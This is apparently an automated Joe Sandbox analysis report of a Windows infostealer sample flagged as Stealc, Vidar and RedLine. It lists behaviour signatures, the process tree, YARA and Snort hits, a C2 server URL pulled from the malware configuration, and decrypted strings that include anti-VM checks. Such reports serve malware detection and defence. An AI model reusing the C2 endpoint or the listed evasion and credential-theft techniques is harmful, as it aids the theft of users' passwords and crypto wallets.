Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4BfhCycV4B.exe

Overview

General Information

Sample name:4BfhCycV4B.exe
renamed because original name is a hash value
Original sample name:71ef0fb3be89dc92fcbe7a6e8e6d6ee8.exe
Analysis ID:1430187
MD5:71ef0fb3be89dc92fcbe7a6e8e6d6ee8
SHA1:07b90b69d37fceed0e01a9eab109e62652d9c39d
SHA256:a464f8ca48e3193c3c58bec992d90875712d87a0165c24568e0b09c700364154
Tags:exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4BfhCycV4B.exe (PID: 5148 cmdline: "C:\Users\user\Desktop\4BfhCycV4B.exe" MD5: 71EF0FB3BE89DC92FCBE7A6E8E6D6EE8)
    • u3z0.0.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Local\Temp\u3z0.0.exe" MD5: 65A31455A497CAEE44C5AA749C50E40B)
      • WerFault.exe (PID: 1504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Qg_Appv5.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)
      • UniversalInstaller.exe (PID: 6532 cmdline: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
        • UniversalInstaller.exe (PID: 7120 cmdline: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
          • cmd.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • MSBuild.exe (PID: 5912 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u3z0.1.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\u3z0.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • UniversalInstaller.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 4124 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\fakJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\fakJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      C:\Users\user\AppData\Local\Temp\fakMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
      • 0xb823a:$s14: keybd_event
      • 0xbef6f:$v1_1: grabber@
      • 0xb8e03:$v1_2: <BrowserProfile>k__
      • 0xb987c:$v1_3: <SystemHardwares>k__
      • 0xb993b:$v1_5: <ScannedWallets>k__
      • 0xb99cb:$v1_6: <DicrFiles>k__
      • 0xb99a7:$v1_7: <MessageClientFiles>k__
      • 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField
      • 0xb9dc3:$v1_8: <ScanWallets>k__BackingField
      • 0xb9de0:$v1_8: <ScanScreen>k__BackingField
      • 0xb9e1a:$v1_8: <ScanVPN>k__BackingField
      • 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
      • 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
      C:\Users\user\AppData\Local\Temp\ypbquxnwoJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        C:\Users\user\AppData\Local\Temp\ypbquxnwoJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 2 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1270:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 32 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.2.u3z0.0.exe.41c0e67.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    2.2.u3z0.0.exe.41c0e67.1.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                      2.2.u3z0.0.exe.41c0e67.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        2.2.u3z0.0.exe.41c0e67.1.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                          2.2.u3z0.0.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            Click to see the 79 entries

                            Sigma Signatures

                            No Sigma rule has matched

                            Snort Signatures

                            Timestamp:04/23/24-09:28:00.837763
                            SID:2044243
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:28:01.224150
                            SID:2044244
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:28:01.851964
                            SID:2051831
                            Source Port:80
                            Destination Port:49708
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:28:01.539793
                            SID:2044246
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:27:56.592477
                            SID:2856233
                            Source Port:49705
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:28:01.538180
                            SID:2051828
                            Source Port:80
                            Destination Port:49708
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 4BfhCycV4B.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\fakAvira: detection malicious, Label: HEUR/AGEN.1307453
                            Found malware configuration
                            Source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                            Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                            Source: C:\Users\user\AppData\Local\Temp\fakReversingLabs: Detection: 59%
                            Source: C:\Users\user\AppData\Local\Temp\ypbquxnwoReversingLabs: Detection: 59%
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                            Multi AV Scanner detection for submitted file
                            Source: 4BfhCycV4B.exeVirustotal: Detection: 39%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\fakJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 4BfhCycV4B.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetProcAddress
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: LoadLibraryA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: lstrcatA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: OpenEventA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateEventA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CloseHandle
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Sleep
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: VirtualFree
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetSystemInfo
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: VirtualAlloc
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HeapAlloc
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetComputerNameA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: lstrcpyA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetProcessHeap
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetCurrentProcess
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: lstrlenA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ExitProcess
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetSystemTime
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: advapi32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: gdi32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: user32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: crypt32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ntdll.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetUserNameA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateDCA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetDeviceCaps
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ReleaseDC
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sscanf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: VMwareVMware
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HAL9TH
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: JohnDoe
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DISPLAY
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: http://185.172.128.76
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: /15f649199f40275b/
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: default10
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetFileAttributesA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GlobalLock
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HeapFree
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetFileSize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GlobalSize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: IsWow64Process
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Process32Next
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetLocalTime
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: FreeLibrary
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetVolumeInformationA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Process32First
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetLocaleInfoA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetModuleFileNameA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DeleteFileA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: FindNextFileA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: LocalFree
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: FindClose
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: LocalAlloc
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetFileSizeEx
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ReadFile
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SetFilePointer
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: WriteFile
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateFileA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: FindFirstFileA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CopyFileA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: VirtualProtect
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetLastError
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: lstrcpynA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: MultiByteToWideChar
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GlobalFree
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: WideCharToMultiByte
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GlobalAlloc
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: OpenProcess
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: TerminateProcess
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetCurrentProcessId
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: gdiplus.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ole32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: bcrypt.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: wininet.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: shlwapi.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: shell32.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: psapi.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: rstrtmgr.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SelectObject
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BitBlt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DeleteObject
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateCompatibleDC
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdiplusStartup
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdiplusShutdown
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipDisposeImage
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GdipFree
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CoUninitialize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CoInitialize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CoCreateInstance
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptDecrypt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptSetProperty
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptDestroyKey
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetWindowRect
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetDesktopWindow
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetDC
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CloseWindow
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: wsprintfA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CharToOemW
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: wsprintfW
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RegQueryValueExA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RegEnumKeyExA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RegOpenKeyExA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RegCloseKey
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RegEnumValueA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CryptUnprotectData
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SHGetFolderPathA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ShellExecuteExA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetOpenUrlA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetConnectA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetCloseHandle
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetOpenA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HttpSendRequestA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HttpOpenRequestA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetReadFile
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: InternetCrackUrlA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: StrCmpCA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: StrStrA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: StrCmpCW
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PathMatchSpecA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RmStartSession
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RmRegisterResources
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RmGetList
